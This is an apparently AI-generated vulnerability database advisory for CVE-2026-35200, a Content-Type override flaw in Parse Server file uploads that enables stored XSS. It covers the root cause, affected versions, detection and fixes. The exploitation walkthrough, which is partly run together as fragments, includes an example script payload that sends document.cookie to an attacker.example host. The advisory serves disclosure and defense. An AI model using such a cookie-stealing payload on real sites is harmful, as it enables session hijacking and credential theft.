
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-35200 is a file upload Content-Type override vulnerability in Parse Server (npm package parse-server) that allows authenticated attackers to upload files with a benign extension (e.g., .txt) while supplying a mismatched Content-Type header (e.g., text/html). The server passes the user-provided Content-Type directly to the storage adapter without validating consistency with the file extension, causing cloud storage adapters such as AWS S3 and Google Cloud Storage to serve the file with the attacker-controlled MIME type. Affected versions include all releases up to and including 8.6.72, and versions 9.0.0 through 9.7.1-alpha.3. The vulnerability was published on April 2, 2026, by maintainer mtrezza, with patched versions released the same day. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 2.1 (Low) (GitHub Advisory, Parse Server Advisory).
The root cause is classified as CWE-436 (Interpretation Conflict): Parse Server's FilesController.createFile method accepts the raw user-supplied Content-Type header and forwards it to the configured storage adapter without verifying that it matches the MIME type implied by the filename extension. Storage adapters like S3 and GCS store and subsequently serve files using the provided Content-Type, causing browsers to interpret the file according to the attacker-controlled MIME type rather than the actual file extension. The default GridFS adapter is not affected because it re-derives Content-Type from the filename extension at serving time. The fix, implemented in PR #10383 (v9 branch) and PR #10384 (v8 branch), changes the createFile logic to always derive Content-Type from the filename extension (mime.getType(filename) || contentType), overriding any user-supplied value when an extension is present (GitHub Advisory, PR #10383, PR #10384).
Successful exploitation enables stored cross-site scripting (XSS) attacks: an attacker can upload an HTML file with embedded JavaScript under a .txt extension, and when another user accesses the file URL served by S3 or GCS with Content-Type: text/html, the browser executes the script in the context of the storage domain. This can lead to session hijacking, credential theft, malware distribution, or phishing attacks targeting users who access the uploaded file. Confidentiality and integrity of the subsequent (user-facing) system are both rated Low impact; availability is not affected. The vulnerable system itself (the Parse Server) has no direct confidentiality or integrity impact (GitHub Advisory, Parse Server Advisory).
Exploitation requires low-level authentication (an account with file upload privileges) and passive user interaction (a victim must access the uploaded file URL). No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.04% (10th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
.txt extension containing an HTML payload with embedded JavaScript, such as <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.POST /1/files/malicious.txt) with the Content-Type header set to text/html instead of text/plain, while the filename retains the .txt extension to pass the allowlist check.Content-Type: text/html.Content-Type: text/html, causing the browser to render and execute the embedded JavaScript, completing the stored XSS attack (GitHub Advisory, Parse Server Advisory).POST /1/files/*.txt) with a Content-Type header of text/html, application/javascript, or other executable MIME types inconsistent with the file extension.Content-Type header does not match the MIME type implied by the uploaded filename extension.Content-Type: text/html (or other executable types) but with non-HTML filename extensions (e.g., .txt, .csv).Upgrade Parse Server to version 8.6.73 (LTS branch) or 9.7.1-alpha.4 (or later, including the stable 9.8.0 release) to apply the fix, which derives Content-Type from the filename extension and overrides any user-supplied value. As a temporary workaround for unpatched deployments, configure the S3 or GCS storage adapter — or a CDN in front of it — to derive Content-Type from the filename extension rather than using the stored metadata value. Additionally, restrict file upload privileges to trusted users only and implement server-side or CDN-level policies that block serving executable MIME types (e.g., text/html, application/javascript) from the file storage domain (GitHub Advisory, PR #10383, PR #10384).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."